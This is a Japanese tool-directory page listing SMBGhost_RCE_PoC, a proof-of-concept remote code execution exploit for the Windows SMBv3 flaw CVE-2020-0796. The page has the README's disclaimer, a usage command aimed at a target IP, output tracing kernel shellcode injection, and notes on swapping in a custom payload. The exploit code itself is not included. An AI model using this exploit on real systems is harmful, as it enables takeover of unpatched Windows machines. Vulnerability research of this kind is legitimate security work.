Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SMBGhost_RCE_PoC — CVE-2020-0796 (SMBGhost) に対する概念実証リモートコード実行エクスプロイト。Windows SMBv3の圧縮脆弱性を標的とし、カーネルシェルコードインジェクションを伴います。 | Kitploit
ツール/GitHubGitHub/chompie1337/smbghost_rce_poc
脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubchompie1337/smbghost_rce_poc

SMBGhost_RCE_PoC

CVE-2020-0796 (SMBGhost) に対する概念実証リモートコード実行エクスプロイト。Windows SMBv3の圧縮脆弱性を標的とし、カーネルシェルコードインジェクションを伴います。

リポジトリを見る
1.4k3376年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SMBGhost_RCE_PoC

CVE-2020-0796「SMBGhost」のRCE PoC

デモンストレーション目的のみ! これは参考としてのみ使用してください。本当です。自身のラボ環境以外ではテストしていません。迅速に作成したもので、信頼性を高めるにはもう少し手を加える必要があります。時々BSODが発生します。自己学習以外の目的で使用することは極めて悪い考えです。あなたのコンピュータは炎上します。子犬が死にます。

さて、それはさておき…

使用例:

root@kitploit:~
$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...

exploit.py内のUSER_PAYLOADにペイロードを置き換えてください。最大600バイトです。それ以上必要な場合は、自分でカーネルシェルコードを修正してください。

lznt1コードはこちらから。クラッシュを引き起こさずにSRVNETバッファヘッダーを破損させる「bad compression」関数を追加するように修正しました。

使用した手法の詳細については、Ricera Securityによるこの優れた解説を参照してください: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html

ツールをダウンロード